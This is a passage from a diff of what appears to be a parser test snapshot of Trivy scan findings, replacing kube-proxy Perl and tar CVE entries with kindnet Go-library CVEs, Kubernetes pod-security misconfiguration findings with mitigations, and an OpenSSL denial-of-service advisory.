"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/pull/175", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://metacpan.org/dist/CPAN/changes", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-1", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-2", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-4116", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", "references": [ - "http://www.openwall.com/lists/oss-security/2011/11/04/2", - "http://www.openwall.com/lists/oss-security/2011/11/04/4", - "https://access.redhat.com/security/cve/CVE-2011-4116", - "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", - "https://rt.cpan.org/Public/Bug/Display.html?id=69106", - "https://seclists.org/oss-sec/2011/q4/238", - "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "perl: File::Temp insecure temporary file handling", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-4116", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-4116", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://seclists.org/oss-sec/2011/q4/238", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5873-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31486", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", + "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-28948", + "installedVersion": "v3.0.0-20210107192922-496545a6307b", + "packageName": "gopkg.in/yaml.v3", "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://github.com/chansen/p5-http-tiny/pull/153", - "https://hackeriet.github.io/cpan-http-tiny-overview/", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - "https://www.openwall.com/lists/oss-security/2023/05/03/4", - "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "https://access.redhat.com/security/cve/CVE-2022-28948", + "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "https://github.com/go-yaml/yaml/issues/666", + "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "https://security.netapp.com/advisory/ntap-20220923-0006/", + "https://www.cve.org/CVERecord?id=CVE-2022-28948", ], }, "category": "Vulnerability", - "description": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available ...", + "name": "crash when attempting to deserialize invalid input", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31486", + "value": "https://avd.aquasec.com/nvd/cve-2022-28948", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://access.redhat.com/security/cve/CVE-2022-28948", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://github.com/go-yaml/yaml/issues/666", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", }, { "type": "URL", - "value": "https://github.com/chansen/p5-http-tiny/pull/153", + "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", }, { "type": "URL", - "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kindnet-cni' of DaemonSet 'kindnet' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "value": "https://avd.aquasec.com/misconfig/ksv003", + }, + { + "type": "URL", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, ], "severity": "LOW", @@ -168579,47 +168328,86 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2005-2541", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - "https://access.redhat.com/security/cve/CVE-2005-2541", - "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", - "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", ], }, - "category": "Vulnerability", - "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(DaemonSet 'kindnet' should not set 'spec.template.spec.hostNetwork' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, ], "severity": "LOW", @@ -168627,749 +168415,1635 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9923", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", - "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", - "http://savannah.gnu.org/bugs/?55369", - "https://access.redhat.com/security/cve/CVE-2019-9923", - "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", - "https://ubuntu.com/security/notices/USN-4692-1", - "https://www.cve.org/CVERecord?id=CVE-2019-9923", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", ], }, - "category": "Vulnerability", - "description": "pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "tar: null-pointer dereference in pax_decode_header in sparse.c", + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsUser' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9923", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "http://savannah.gnu.org/bugs/?55369", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv022", + ], + }, + "category": "Misconfiguration", + "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", + "name": "Non-default capabilities added(Container 'kindnet-cni' of DaemonSet 'kindnet' should not set 'securityContext.capabilities.add')", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9923", + "value": "https://avd.aquasec.com/misconfig/ksv022", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(DaemonSet 'kindnet' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4692-1", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9923", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20193", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "fixedVersion": "3.1.1-r0", + "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2023-2650", + "installedVersion": "3.1.0-r4", + "packageName": "libcrypto3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20193", - "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", - "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", - "https://savannah.gnu.org/bugs/?59897", - "https://security.gentoo.org/glsa/202105-29", - "https://ubuntu.com/security/notices/USN-5329-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20193", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in the src/list.c of tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input file to tar to cause uncontrolled consumption of memory. The highest threat from this vulnerability is to system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", "mitigation": undefined, - "name": "tar: Memory leak in read_header() in list.c", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20193", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20193", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?59897", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-29", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": 